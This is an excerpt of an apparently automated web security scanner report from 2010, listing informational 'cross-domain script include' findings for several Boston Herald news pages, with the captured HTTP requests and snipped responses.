Path:	/news/police_logs/view/20101027dont_rock_the_boat_or_break_into_it_either/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/police_logs/view/20101027dont_rock_the_boat_or_break_into_it_either/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:09:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37748

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.121. http://bostonherald.com/news/police_logs/view/20101028david_ortiz_goes_to_bat_to_combat_hub_violence/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/police_logs/view/20101028david_ortiz_goes_to_bat_to_combat_hub_violence/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/police_logs/view/20101028david_ortiz_goes_to_bat_to_combat_hub_violence/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:08:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 40369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.122. http://bostonherald.com/news/police_logs/view/20101104too_much_candy_at_this_party/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/police_logs/view/20101104too_much_candy_at_this_party/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/police_logs/view/20101104too_much_candy_at_this_party/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:08:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 38187

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.123. http://bostonherald.com/news/police_logs/view/20101105caught_green_handed/format=comments&srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/police_logs/view/20101105caught_green_handed/format=comments&srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:07:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 52329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.124. http://bostonherald.com/news/police_logs/view/20101105caught_green_handed/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/police_logs/view/20101105caught_green_handed/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/police_logs/view/20101105caught_green_handed/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:07:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 38300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.125. http://bostonherald.com/news/politics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/politics/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /news/politics/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:18:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 60115

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.126. http://bostonherald.com/news/politics/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/politics/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

9.127. http://bostonherald.com/news/politics/view/20101106pol_calls_for_ouster_of_states_gop_leader/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/politics/view/20101106pol_calls_for_ouster_of_states_gop_leader/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/politics/view/20101106pol_calls_for_ouster_of_states_gop_leader/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:22:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 38994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.128. http://bostonherald.com/news/politics/view/20101106towns_high_and_dry_on_boat_taxes_experts_excise_laws_favor_john_kerry_other_bay_state_owners/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/politics/view/20101106towns_high_and_dry_on_boat_taxes_experts_excise_laws_favor_john_kerry_other_bay_state_owners/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/politics/view/20101106towns_high_and_dry_on_boat_taxes_experts_excise_laws_favor_john_kerry_other_bay_state_owners/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:22:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 42534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

